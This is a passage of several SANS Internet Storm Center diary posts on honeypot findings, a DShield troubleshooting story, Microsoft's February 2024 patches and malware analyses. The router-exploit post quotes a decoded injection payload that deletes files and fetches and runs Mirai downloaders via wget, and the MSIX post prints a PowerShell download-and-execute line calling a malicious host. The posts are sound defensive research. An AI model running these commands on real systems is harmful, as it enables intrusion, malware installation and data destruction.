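commands = [
    r'echo -ne "\x7f\x45\x4c\x46" >> x86',
    r'echo -ne "\x01\x01\x01\x00" >> x86',
]

# Extract the \xNN escape sequences and decode them, mimicking what
# `echo -ne` writes on the victim system.
binary = b"".join(
    bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", cmd))
    for cmd in commands
)

print(binary.hex())                        # reassembled bytes (here: the ELF magic)
print(hashlib.sha256(binary).hexdigest())  # compare against the published hash
```

Running this over all 41 commands in order yields the same file and hash as the CyberChef recipe.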

Why All of the Hexadecimal Numbers and Commands?

It is clear that the attacker wanted to evade detection by assembling the malware binary on the victim device, rather than risk triggering anti-malware tools by downloading a malicious executable. Consulting the MITRE ATT&CK Framework, two key tactics used in this attack are worth considering:

  • Tactic: Execution (TA0002)
    • Technique: Command and Scripting Interpreter: Unix Shell (T1059.004)
  • Tactic: Defense Evasion (TA0005)
    • Technique: Obfuscated Files or Information: Command Obfuscation (T1027.010)

What is It?

The assembled binary’s hash comes up in various databases as malicious, categorized as ‘Trojan.Mirai / miraidownloader’ [6], with several entries from community members attributing it to the Mirai malware family. Not much is known about this Linux ELF executable. Many databases give it a low threat score of 3/10; however, a low score does not mean the binary is safe. More information about the malware sample can be found on Recorded Future’s Triage webpage [7].

How Can We Mitigate This Kind of Attack?

Our honeypot emulates a poorly defended device on the open Internet. This particular attack scans for open SSH ports on devices with weak administrative credentials. Since Mirai-based malware targets IoT devices, one of the simplest defenses is to change the default password of the IoT device to a long, complex, unique password (16 characters would be fine). Routers and Apache servers that are targets should be patched according to the guidance in the CVEs. Not exposing IoT devices unnecessarily to the Internet avoids compromise as well.

Samples of the malware can be downloaded from the VirusTotal and Recorded Future [7] websites within the citations below.

[1] What is a Botnet?: https://www.akamai.com/glossary/what-is-a-botnet
[2] What is Mirai?: https://www.cloudflare.com/learning/ddos/glossary/mirai-botnet/
[3] TP-Link WAN-Side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal: https://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal
[4] Akamai SIRT Security Advisory: CVE-2023-26801 Exploited to spread Mirai Botnet Malware: https://www.akamai.com/blog/security-research/cve-2023-26801-exploited-spreading-mirai-botnet
[5] Mirai Variant IZ1H9 Exploits: 13 Shocking New Attacks: https://impulsec.com/cybersecurity-news/mirai-variant-iz1h9-exploits/
[6] Virus Total: https://www.virustotal.com/gui/file/b1c22ba1b958ba596afb9b1a5cd49abf4eba8d24e85b86b72eed32acc1745852
[7] Recorded Future Triage: https://tria.ge/230526-dk1rrsde63
[8] https://www.sans.edu/cyber-security-programs/bachelors-degree/

Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu


Published: 2024-02-15

[Guest Diary] Learning by doing: Iterative adventures in troubleshooting

[This is a Guest Diary by Preston Fitzgerald, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].]

A DShield honeypot [2] running on a Raspberry Pi can sometimes be a bit of a fickle thing. While some may enjoy a ‘set it and forget it’ experience, I’ve found that my device sometimes requires a bit of babysitting. The latest example popped up when I connected to the device to inspect logs last week. What began as curiosity about failed log parsing led to learning about the DShield updater.


The honeypot collects various potentially interesting artifacts for analysis. One source of this data is the webhoneypot.json file /srv/db/webhoneypot.json. Using jq, we can quickly parse this JSON for information about what remote hosts we’ve seen or what user agents they presented when they made requests to the honeypot:

jq '.headers | .host' webhoneypot.json | sort | uniq > ~/ops/hosts-DD-MM
jq .useragent webhoneypot.json | sort | uniq > ~/ops/agents-DD-MM

Part of the experience of monitoring a system like this is finding what feels good to you and what practices help you produce results. Some handlers will work to implement automation to identify interesting artifacts. Some will hunt and peck around until something catches their eye. One thing I’ve found works for me is periodically dumping information like this to file.

Roadblock ahead

What happened last week? My trusty tool jq returned a cry for help:

parse error: Invalid numeric literal at line 1, column 25165826

webhoneypot.json is malformed in some way. To make matters worse, the Pi was periodically crashing. It’s difficult to get any meaningful work done when your SSH sessions have a lifespan of two minutes. I decided to pull the SD card so I could inspect it directly, removing the Pi itself from the equation.

I plugged my card reader into a lab machine and instructed VMware to assign ownership of the device to a Slingshot[3] VM. 

Figure 1: VMware Workstation can treat a device connected physically to the host as if it were connected directly to the guest Virtual Machine. This feature is accessible in the VM -> Removable Devices menu. This card reader is labeled Super Top Mass Storage Device

With the Pi’s storage now mounted to the VM, it’s possible to navigate to the offending file and inspect it.

Figure 2: Screenshot showing the mounted file system 'rootfs' and the contents of /srv/db including webhoneypot.json

Notably, this file occupies nearly half a gigabyte of the card’s limited storage space. That’s a big text file! 

To the toolbox

Where did jq encounter its parsing error again?

parse error: Invalid numeric literal at line 1, column 25165826

It doesn’t like the 25,165,826th character (out of over 450 million total characters). How do we find out what’s in that position? What tools can we use? Another interesting quality of the file is that it consists of one single line. Go-to tools like head and tail are rendered less useful due to the single-line format. Though the file size is within vim’s documented maximum, I found that it struggled to open this file in my virtualized environment.

Thankfully awk’s substring feature will allow us to pluck out just the part of the file we are interested in working with.

Figure 3: Screenshot showing awk’s substring feature. Syntax: substr(string, starting index, length) here we are starting on character 25165820 and grabbing the following 20 characters.
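The same window can be pulled out in Python instead of awk. A small sketch follows; the helper name `peek` is my own, and it assumes the file is plain ASCII so jq's 1-based character positions map 1:1 to byte offsets.

```python
def peek(path, column, before=6, length=20):
    """Return `length` bytes, starting `before` characters ahead of the
    1-based `column` reported by jq's parse error."""
    with open(path, "rb") as f:
        f.seek(max(column - 1 - before, 0))  # convert to a 0-based byte offset
        return f.read(length)

# Usage against the corrupted log (path from the article):
# peek("/srv/db/webhoneypot.json", 25165826)
```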


We can begin to see what’s going wrong here by manipulating the starting index and length of the substring and comparing it to prettified JSON that jq is able to output from an earlier entry before it encounters its parsing error:

Figure 4: Screenshot showing expanded substring to get more context before and after the parsing error

Figure 5: Screenshot showing sample JSON structure from part of the document before the parsing error. Here we can see the end of the user agent string underlined in yellow, and the e": 72 part underlined in pink. Comparing the output of awk to the JSON structure we can see just how much information is missing between the two.


The JSON structure has been destroyed because the text is truncated between the user agent and part of the signature_id object. Unfortunately, patching up the structure here and re-running jq revealed that there are many such holes in the data. It didn’t take more than a couple of these mending and jq processing cycles to realize that it was futile to try sewing it all back together.


So far, we’ve discovered that we have one very large, corrupted log file. It is too damaged to try to piece back together manually and the structure is too damaged to parse it as JSON. How can we salvage the useful artifacts within?

Let’s forget for a moment that this is meant to be JSON and treat it as any other text. By default, grep will return every line that matches the expression. We can use the -o option to return only the matched part of the data. This is useful because otherwise it would return the entire file on any match.

Return user agents:

Figure 6: Screenshot showing grep output matching the user-agent field in webhoneypot.json

Return hosts:

Figure 7: Screenshot showing grep output matching the IP addresses and ports in webhoneypot.json
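A rough Python equivalent of these grep extractions: even though the JSON structure is destroyed, the individual key/value pairs survive and can be matched with a regular expression. The blob below is synthetic, and the `"key": "value"` spacing is an assumption about the file's layout.

```python
import re

# Synthetic stand-in for the corrupted single-line JSON: structure is broken,
# but the "useragent" and "host" pairs (the fields jq was extracting) survive.
blob = ('garbage"useragent": "Mozilla/5.0 zgrab/0.x"junk'
        '"host": "203.0.113.7:8080"noise"useragent": "curl/8.0"')

# Equivalent of `grep -o ... | sort | uniq`: keep only the matched values.
agents = sorted(set(re.findall(r'"useragent": "([^"]*)"', blob)))
hosts = sorted(set(re.findall(r'"host": "([^"]*)"', blob)))

print(agents)
print(hosts)
```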

There are almost always options and many pathways that lead to success. By reaching for another tool, we can get the information we were looking for.

So what about the Pi?

Let’s quantify my observation that the device was crashing often. Just how often did this happen? I started by copying /var/log/messages from the card over to my local disk. 

How much data are we working with? Let’s get a line count:

wc -l messages

This returned over 450,000 lines. That’s good news: we have some information to inspect. How many of those are startup messages?

grep -i booting messages | wc -l

1,371 matches for boot messages. After checking the start and end dates of the log, that works out to roughly 200 reboots a day on average. Let’s see if syslog has additional details for us. After searching for messages related to initial startup and grabbing the lines that appear before those messages, I was able to spot something: the log contains many mentions of reboot.

grep -i /sbin/reboot syslog


Figure 8: Screenshot showing a sample of the grep results for references to /sbin/reboot in syslog


How surprising! The Pi wasn’t crashing, it was being rebooted intentionally by a cron job. I copied the DShield cron located in /etc/cron.d/dshield and took a look at its contents.

grep -i /sbin/reboot dshield


Figure 9: A screenshot showing a number of cron jobs that trigger a reboot

Correction: it’s not a single cron job, it’s several. Something has created 216 cron entries to reboot the Pi (this number is familiar; remember our ~200 reboots per day observation from the logs). What could have made these entries? Let’s search the entire filesystem of the Pi for references to /sbin/reboot:

grep -r "/sbin/reboot" .


Figure 10: A screenshot showing the line in install.sh that appends reboot commands to /etc/cron.d/dshield.

The DShield installer itself creates these entries. I have version 93, which appears to be one version behind the current installer available on GitHub. The installer picks random time offsets; because the firewall log parser uploads the sensor data before rebooting, the intent is to spread the load so there isn’t a large spike of incoming sensor data at any one time throughout the day. So why would install.sh run multiple times? You only run it once, when you first install the sensor.

The answer is automatic updates. When you initially configure DShield you can enable automatic updates. The update script checks your current version and compares it to the latest version available on GitHub. Remember that my installed version was one behind current.

Figure 11: The updater compares the current DShield version to the latest available. If it sees that we are behind, it checks out the main branch of the repository and performs git pull to download the latest code before running the installer.


Inspecting /srv/log for install logs, it’s clear that the installer is running hundreds of times per day. 


Figure 12: A screenshot showing a directory listing of /srv/log where we see timestamped logs indicating the installer was running many times per day.


So what happened?

Knowing for certain which problem happened first will require further log review, but my current hypothesis is this: At some point, the updater started the installer. The installer created a cron job to kick off a reboot but the random time set for the task happened to be very near the current time. The installer was unable to finish its work before the Pi shut itself down. This is supported by the fact that some of the install logs I reviewed seem to end abruptly before the final messages are printed out.

There are several errors throughout these logs, including missing certificates, failed package update steps, locked log files, and ‘expected programs not found in PATH’. I believe some combination of these problems caused the installer to fail each time it was run by the updater, resulting in a loop.


Re-imaging the Pi will be the simplest way to get us out of this situation, but how could the problem be remediated in the long run?

Regardless of the initial cause of this problem, one potential fix for the issue of redundant cron jobs is this:

Before appending the reboot and upload tasks, the installer could delete /etc/cron.d/dshield. It appears this file has only four unique entries: 


Figure 13: A screenshot showing the four unique cron jobs used by DShield. We only need these entries, and not the hundreds of redundant lines.


By deleting the file and creating each of these jobs fresh when the installer runs, we can eliminate the risk of creating an 864-line cron configuration file.

It may also be advantageous to move this part of the installer script to the end of the process to eliminate the risk of the reboot firing before the script completes.

Most computer-inclined folks like their processes, their patterns, their Standard Operating Procedures. It’s important that we remain curious and nimble. Sometimes discovering something interesting or useful is the direct result of asking ourselves ‘why’ when something doesn’t seem right. Having the option to throw away a VM or revert it to snapshot is great. Throwing away a docker container that isn’t working the way we expect is convenient. Re-imaging a Pi to get it back to a known-good state helps us jump right back into our work. However, there can be real educational benefit when we slow down and perform troubleshooting on these things we generally view as ephemeral and when we share what we have learned, this can lead to improvements from which we all benefit.

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] DShield: https://github.com/DShield-ISC/dshield
[3] Slingshot Linux: https://www.sans.org/tools/slingshot/


Jesse La Grew


Published: 2024-02-13

Microsoft February 2024 Patch Tuesday

This month we got patches for 80 vulnerabilities. Of these, 5 are critical, and 2 are being exploited according to Microsoft.

One of the exploited vulnerabilities is the Internet Shortcut Files Security Feature Bypass Vulnerability (CVE-2024-21412). According to the advisory, an unauthenticated attacker could send the targeted user a specially crafted file that is designed to bypass displayed security checks. However, the attacker would have no way to force a user to view the attacker-controlled content. Instead, the attacker would have to convince them to take action by clicking on the file link. The CVSS for this vulnerability is 8.1.

The second exploited vulnerability is the Windows SmartScreen Security Feature Bypass Vulnerability (CVE-2024-21351). According to the advisory, the vulnerability allows a malicious actor to inject code into SmartScreen and potentially gain code execution, which could potentially lead to some data exposure, lack of system availability, or both.

Among the critical vulnerabilities, one is the Microsoft Exchange Server Elevation of Privilege Vulnerability (CVE-2024-21410). According to the advisory, an attacker who successfully exploited this vulnerability could relay a user's leaked Net-NTLMv2 hash against a vulnerable Exchange Server and authenticate as the user. The CVSS for this vulnerability is 9.8 – the highest for this month.

A second critical vulnerability worth mentioning is the Microsoft Outlook Remote Code Execution Vulnerability (CVE-2024-21413). Successful exploitation of this vulnerability would allow an attacker to bypass the Office Protected View and open in editing mode rather than protected mode. An attacker could craft a malicious link that bypasses the Protected View Protocol, which leads to the leaking of local NTLM credential information and remote code execution (RCE). The CVSS for this vulnerability is 9.8 as well.

February 2024 Security Updates

CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG)
-- no title --
%%cve:2024-21626%% No No - - - 8.6 8.6
.NET Denial of Service Vulnerability
%%cve:2024-21386%% No No - - Important 7.5 6.7
%%cve:2024-21404%% No No - - Important 7.5 6.7
Azure Connected Machine Agent Elevation of Privilege Vulnerability
%%cve:2024-21329%% No No - - Important 7.3 6.4
Azure DevOps Server Remote Code Execution Vulnerability
%%cve:2024-20667%% No No - - Important 7.5 6.5
Azure Stack Hub Spoofing Vulnerability
%%cve:2024-20679%% No No - - Important 6.5 5.7
Chromium: CVE-2024-1059 Use after free in WebRTC
%%cve:2024-1059%% No No - - -    
Chromium: CVE-2024-1060 Use after free in Canvas
%%cve:2024-1060%% No No - - -    
Chromium: CVE-2024-1077 Use after free in Network
%%cve:2024-1077%% No No - - -    
Chromium: CVE-2024-1283 Heap buffer overflow in Skia
%%cve:2024-1283%% No No - - -    
Chromium: CVE-2024-1284 Use after free in Mojo
%%cve:2024-1284%% No No - - -    
Dynamics 365 Field Service Spoofing Vulnerability
%%cve:2024-21394%% No No - - Important 7.6 6.6
Dynamics 365 Sales Spoofing Vulnerability
%%cve:2024-21396%% No No - - Important 7.6 6.6
%%cve:2024-21328%% No No - - Important 7.6 6.6
Internet Connection Sharing (ICS) Denial of Service Vulnerability
%%cve:2024-21348%% No No - - Important 7.5 6.5
Internet Shortcut Files Security Feature Bypass Vulnerability
%%cve:2024-21412%% No Yes - - Important 8.1 7.1
MITRE: CVE-2023-50387 DNSSEC verification complexity can be exploited to exhaust CPU resources and stall DNS resolvers
%%cve:2023-50387%% No No - - Important    
Microsoft ActiveX Data Objects Remote Code Execution Vulnerability
%%cve:2024-21349%% No No - - Important 8.8 7.7
Microsoft Azure Active Directory B2C Spoofing Vulnerability
%%cve:2024-21381%% No No - - Important 6.8 6.1
Microsoft Azure File Sync Elevation of Privilege Vulnerability
%%cve:2024-21397%% No No - - Important 5.3 4.8
Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability
%%cve:2024-21403%% No No - - Important 9.0 8.1
Microsoft Azure Kubernetes Service Confidential Container Remote Code Execution Vulnerability
%%cve:2024-21376%% No No - - Important 9.0 8.1
Microsoft Azure Site Recovery Elevation of Privilege Vulnerability
%%cve:2024-21364%% No No - - Moderate 9.3 8.4
Microsoft Defender for Endpoint Protection Elevation of Privilege Vulnerability
%%cve:2024-21315%% No No - - Important 7.8 6.8
Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
%%cve:2024-21389%% No No - - Important 7.6 6.6
%%cve:2024-21393%% No No - - Important 7.6 6.6
%%cve:2024-21395%% No No - - Important 8.2 7.1
Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability
%%cve:2024-21327%% No No - - Important 7.6 6.6
Microsoft Dynamics Business Central/NAV Information Disclosure Vulnerability
%%cve:2024-21380%% No No - - Critical 8.0 7.0
Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability
%%cve:2024-21399%% No No Less Likely Less Likely Moderate 8.3 7.2
Microsoft Entra Jira Single-Sign-On Plugin Elevation of Privilege Vulnerability
%%cve:2024-21401%% No No - - Important 9.8 8.8
Microsoft Exchange Server Elevation of Privilege Vulnerability
%%cve:2024-21410%% No No - - Critical 9.8 9.1
Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability
%%cve:2024-21354%% No No - - Important 7.8 6.8
%%cve:2024-21355%% No No - - Important 7.0 6.1
%%cve:2024-21405%% No No - - Important 7.0 6.1
Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
%%cve:2024-21363%% No No - - Important 7.8 6.8
Microsoft ODBC Driver Remote Code Execution Vulnerability
%%cve:2024-21347%% No No - - Important 7.5 6.5
Microsoft Office OneNote Remote Code Execution Vulnerability
%%cve:2024-21384%% No No - - Important 7.8 6.8
Microsoft Office Remote Code Execution Vulnerability
%%cve:2024-20673%% No No - - Important 7.8 6.8
Microsoft Outlook Elevation of Privilege Vulnerability
%%cve:2024-21402%% No No - - Important 7.1 6.2
Microsoft Outlook Remote Code Execution Vulnerability
%%cve:2024-21413%% No No - - Critical 9.8 8.5
%%cve:2024-21378%% No No - - Important 8.0 7.0
Microsoft Teams for Android Information Disclosure
%%cve:2024-21374%% No No - - Important 5.0 4.4
Microsoft WDAC ODBC Driver Remote Code Execution Vulnerability
%%cve:2024-21353%% No No - - Important 8.8 7.7
Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
%%cve:2024-21350%% No No - - Important 8.8 7.7
%%cve:2024-21352%% No No - - Important 8.8 7.7
%%cve:2024-21358%% No No - - Important 8.8 7.7
%%cve:2024-21360%% No No - - Important 8.8 7.7
%%cve:2024-21361%% No No - - Important 8.8 7.7
%%cve:2024-21366%% No No - - Important 8.8 7.7
%%cve:2024-21369%% No No - - Important 8.8 7.7
%%cve:2024-21375%% No No - - Important 8.8 7.7
%%cve:2024-21420%% No No - - Important 8.8 7.7
%%cve:2024-21359%% No No - - Important 8.8 7.7
%%cve:2024-21365%% No No - - Important 8.8 7.7
%%cve:2024-21367%% No No - - Important 8.8 7.7
%%cve:2024-21368%% No No - - Important 8.8 7.7
%%cve:2024-21370%% No No - - Important 8.8 7.7
%%cve:2024-21391%% No No - - Important 8.8 7.7
Microsoft Word Remote Code Execution Vulnerability
%%cve:2024-21379%% No No - - Important 7.8 6.8
Skype for Business Information Disclosure Vulnerability
%%cve:2024-20695%% No No - - Important 5.7 5.0
Trusted Compute Base Elevation of Privilege Vulnerability
%%cve:2024-21304%% No No - - Important 4.1 3.6
Win32k Elevation of Privilege Vulnerability
%%cve:2024-21346%% No No - - Important 7.8 6.8
Windows DNS Client Denial of Service Vulnerability
%%cve:2024-21342%% No No - - Important 7.5 6.5
Windows DNS Information Disclosure Vulnerability
%%cve:2024-21377%% No No - - Important 7.1 6.2
Windows Hyper-V Denial of Service Vulnerability
%%cve:2024-20684%% No No - - Critical 6.5 5.7
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2024-21338%% No No - - Important 7.8 6.8
%%cve:2024-21371%% No No - - Important 7.0 6.1
%%cve:2024-21345%% No No - - Important 8.8 7.7
Windows Kernel Information Disclosure Vulnerability
%%cve:2024-21340%% No No - - Important 4.6 4.0
Windows Kernel Remote Code Execution Vulnerability
%%cve:2024-21341%% No No - - Important 6.8 5.9
Windows Kernel Security Feature Bypass Vulnerability
%%cve:2024-21362%% No No - - Important 5.5 4.8
Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability
%%cve:2024-21356%% No No - - Important 6.5 5.7
Windows Network Address Translation (NAT) Denial of Service Vulnerability
%%cve:2024-21343%% No No - - Important 5.9 5.2
%%cve:2024-21344%% No No - - Important 5.9 5.2
Windows OLE Remote Code Execution Vulnerability
%%cve:2024-21372%% No No - - Important 8.8 7.7
Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
%%cve:2024-21357%% No No - - Critical 7.5 6.5
Windows Printing Service Spoofing Vulnerability
%%cve:2024-21406%% No No - - Important 7.5 6.5
Windows SmartScreen Security Feature Bypass Vulnerability
%%cve:2024-21351%% No Yes - - Moderate 7.6 6.6
Windows USB Generic Parent Driver Remote Code Execution Vulnerability
%%cve:2024-21339%% No No - - Important 6.4 5.6

Renato Marinho
Morphus Labs| LinkedIn|Twitter


Published: 2024-02-12

Exploit against Unnamed "Bytevalue" router vulnerability included in Mirai Bot

Today, I noticed the following URL showing up in our "First Seen" list:


Initially, our sensors detected requests for just "goform/webRead/open". 


Bytevalue login page from bytevalue.com

URLs containing "goform" are typically associated with the RealTek SDK. Routers built around the RealTek SoC (System on a Chip) usually use the SDK to implement web-based access tools. The RealTek SDK had numerous vulnerabilities in the past. We currently track over 900 unique URLs in our honeypots using a "/goform/" URL. The most popular URL is usually "goform/set_LimitClient_cfg", associated with CVE-2023-26801 in LB-Link routers. But simple password brute force attacks are also common, taking advantage of default passwords.


So far, I have not been able to identify a specific CVE number for vulnerabilities related to  "goform/webRead/open". However, a Chinese blog post from November [1] suggests that this is related to a vulnerability in routers made by the Chinese company "BYTEVALUE." I could not find a patch for the vulnerability.

The exploit attempt in the URL above follows the standard command injection pattern. URL-decoding it leads to:

rm -rf *; cd /tmp; wget; chmod 777 bruh.sh; ./bruh.sh

With "bruh.sh" being the typical shell script downloading the next stage for various architectures:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lol; chmod +x lol; ./lol 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lmao; chmod +x lmao; ./lmao 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kekw; chmod +x kekw; ./kekw 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O what; chmod +x what; ./what 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kys; chmod +x kys; ./kys 0day_router
[I removed various versions that used offensive filenames]

The binary is simply UPX-packed. It contains strings pointing to other router exploits and paths in "/home/landley/", which may indicate the system on which the binary was compiled.

VirusTotal did not have a sample yet when I uploaded mine [2]. By now, however, the sample is widely recognized as a "Mirai" variant, which appears correct.

[1] https://blog.csdn.net/zkaqlaoniao/article/details/134328873
[2] https://www.virustotal.com/gui/file/0d0f841ff15c3a01e5376ec7453c2465ec87a9450a21053c3ab4fcb9bbbe1605?nocache=1

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu


Published: 2024-02-09

Internet Storm Center Podcast ("Stormcast") 15th Birthday

Happy Birthday to our daily Podcast. 3,685 episodes, about 410 hours or 17 days of content. I hope you are enjoying it. Please do me a favor and participate in our quick two-question survey to help me improve the podcast. It will remain brief and no-frills. But is there any content I should emphasize? Are there any stories I missed or should not have included? Let me know.


The podcast is already available on a wide range of platforms. Use Amazon Alexa to wake you up with the latest news, or "watch" it on YouTube. Of course, most podcast platforms like Apple and Google should carry it. But did I miss one?

And in case you don't know about it yet, here is the latest episode: https://isc.sans.edu/podcastdetail/8846

Looking for a trip back down memory lane? Try Xavier's Stormcast Roulette: https://stormcast.fun/



Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu


Published: 2024-02-09

MSIX With Heavily Obfuscated PowerShell Script

A few months ago, we saw waves of malicious MSIX packages[1] dropping malware once installed on victims' computers. I started hunting for such files and saw a big decrease in interesting hits. Today, my YARA rule triggered on a new sample. Called "Rabby-Wallet.msix", the file has a VT score of 8/58[2].

After a quick look, the file appears to implement the same technique to execute a malicious PowerShell payload:

remnux@remnux:/MalwareZoo/20240209$ zipdump.py Rabby-Wallet.msix 
Index Filename                                        Encrypted Timestamp           
    1 Registry.dat                                            0 2024-01-23 11:54:56 
    2 1_Ll57yViA-ZpEVlnH_Hf5ZQ.jpg                            0 1980-00-00 00:00:00 
    3 VC_redist.x86.exe                                       0 2023-10-02 14:34:06 
    4 Refresh2.ps1                                            0 2024-01-16 11:46:44 
    5 StartingScriptWrapper.ps1                               0 2023-12-20 09:54:32 
    6 config.json                                             0 2024-01-23 11:54:56 
    7 PsfRuntime64.dll                                        0 2023-12-20 10:40:08 
    8 PsfRuntime32.dll                                        0 2023-12-20 10:39:36 
    9 PsfRunDll64.exe                                         0 2023-12-20 10:40:12 
   10 PsfRunDll32.exe                                         0 2023-12-20 10:39:40 
   11 Assets/Store50x50Logo.scale-100.jpg                     0 1980-00-00 00:00:00 
   12 Assets/rabby.exeSquare44x44Logo.scale-100.png           0 2023-12-20 09:54:38 
   13 Assets/rabby.exeSquare150x150Logo.scale-100.png         0 2023-12-20 09:54:38 
   14 Assets/Store50x50Logo.scale-150.jpg                     0 1980-00-00 00:00:00 
   15 Assets/Store50x50Logo.scale-125.jpg                     0 1980-00-00 00:00:00 
   16 Assets/Store50x50Logo.scale-200.jpg                     0 1980-00-00 00:00:00 
   17 Assets/Store50x50Logo.scale-400.jpg                     0 1980-00-00 00:00:00 
   18 VFS/AppData/local/gpg.exe                               0 2007-09-17 14:52:14 
   19 VFS/AppData/local/iconv.dll                             0 2004-01-14 00:56:16 
   20 AI_STUBS/AiStubX86.exe                                  0 2024-01-23 11:54:56 
   21 resources.pri                                           0 2024-01-23 11:54:56 
   22 AppxManifest.xml                                        0 2024-01-23 11:54:56 
   23 AppxBlockMap.xml                                        0 2024-01-23 11:54:58 
   24 [Content_Types].xml                                     0 2024-01-23 11:54:56 
   25 AppxMetadata/CodeIntegrity.cat                          0 2024-01-23 11:54:56 
   26 AppxSignature.p7x                                       0 2024-01-23 16:53:16 
remnux@remnux:/MalwareZoo/20240209$ zipdump.py Rabby-Wallet.msix -s 6 -d
{
    "processes": [
        {
            "executable": ".*",
            "fixups": []
        }
    ],
    "applications": [
        {
            "id": "rabby.exe",
            "startScript": {
                "scriptExecutionMode": "-ExecutionPolicy RemoteSigned",
                "scriptPath": "Refresh2.ps1"
            }
        }
    ]
}
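Since an MSIX package is just a ZIP archive, the listing and config extraction above can be approximated with the Python standard library as a minimal stand-in for zipdump.py. The in-memory archive built below is synthetic; point ZipFile at the real .msix file instead.

```python
import io
import json
import zipfile

def read_config(msix):
    """List an MSIX package's members and parse its config.json."""
    with zipfile.ZipFile(msix) as z:
        names = z.namelist()
        config = json.loads(z.read("config.json"))
    return names, config

# Synthetic package containing only the startup configuration:
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("config.json", json.dumps({
        "applications": [{"id": "rabby.exe",
                          "startScript": {"scriptPath": "Refresh2.ps1"}}]
    }))

names, config = read_config(buf)
print(names)
print(config["applications"][0]["startScript"]["scriptPath"])
```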

Based on the JSON config, you can see that the script called "Refresh2.ps1" will be executed during the MSIX installation. Let's have a look at the content:

For sure, this script will make your eyes cry! When I'm facing such obfuscation, I don't spend my time reversing everything manually. When you need to deobfuscate PowerShell, Microsoft has a wonderful combination of tools for you: logman[3] and AMSI[4].

Let's enable PowerShell tracing:

logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets

Now, let's run the payload and we get this in the output:

You can see that the script constructs an Invoke-Expression call with a char()-encoded payload:

IEX (IWR -Uri 'hxxps://ads-analyze[.]top/check1.php' -UseBasicParsing -UserAgent 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.46 OPR/').Content

Unfortunately, the website returns an HTTP 503 error, even with the same User-Agent...

[1] https://isc.sans.edu/diary/Redline+Dropped+Through+MSIX+Package/30404
[2] https://www.virustotal.com/gui/file/b404235ee0e043d7512ab38d88fc3bf2534597e3dff7e6df7ee22fe9cb3c896c/detection
[3] https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/logman
[4] https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant


Published: 2024-02-08

A Python MP3 Player with Builtin Keylogger Capability

I don't know if there is a trend, but I recently found some malicious Python scripts (targeting Windows hosts) that include a GUI. They don't try to hide from the victim but, on the contrary, try to gain the victim's confidence. One example was a game[1] combined with an infostealer.

Yesterday, I found another one that mimics an MP3 player:

This is very easy to do in Python: create a Tk GUI and use pygame[2] to handle the MP3 files:


This simple MP3 player has a gift for you: It includes a keylogger based on another popular library: pynput[3]. All recorded keystrokes are sent to a simple TCP connection established with the C2. There is no encryption, nothing. Just raw keycodes are sent.
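The exfiltration channel can be sketched with nothing but the standard library. In this hypothetical stand-in, a local listener plays the C2's role, and hard-coded keycodes replace the pynput capture:

```python
import socket
import threading

received = []

# Stand-in for the attacker's C2: a plain TCP listener collecting raw bytes.
server = socket.create_server(("127.0.0.1", 0))
port = server.getsockname()[1]

def c2_listener():
    conn, _ = server.accept()
    with conn:
        while True:
            chunk = conn.recv(1024)
            if not chunk:
                break
            received.extend(chunk)

t = threading.Thread(target=c2_listener)
t.start()

# What the malicious player does: push each keycode over the socket, in the
# clear, with no encryption or encoding (keycodes are hard-coded here instead
# of being captured with pynput).
with socket.create_connection(("127.0.0.1", port)) as s:
    for code in [72, 105]:  # keycodes for "Hi"
        s.sendall(bytes([code]))

t.join()
server.close()
print(bytes(received).decode())  # Hi
```

Because nothing is encrypted, anyone on the network path between the victim and the C2 can read the keystrokes verbatim.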

This is a perfect opportunity to show you how powerful keyloggers are. Even if you use robust passwords, everything is exfiltrated to the attacker's computer. I made a quick video to demonstrate how it works[4]. I just modified the C2 details to match my lab. Let's play some music:

The Python script (SHA256:4f6388fa03aaff486886ca09bc1047b109c92451618d90b4aaef2e89ce14a0af) has a very low VT detection score (2/61)[5].

[1] https://isc.sans.edu/diary/Shall+We+Play+a+Game/30510
[2] https://pypi.org/project/pygame/
[3] https://pypi.org/project/pynput/
[4] https://youtu.be/4fViSafrjnY
[5] https://www.virustotal.com/gui/file/4f6388fa03aaff486886ca09bc1047b109c92451618d90b4aaef2e89ce14a0af/details

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant


Published: 2024-02-07

Anybody know what this URL is about? Maybe a Balena API request?

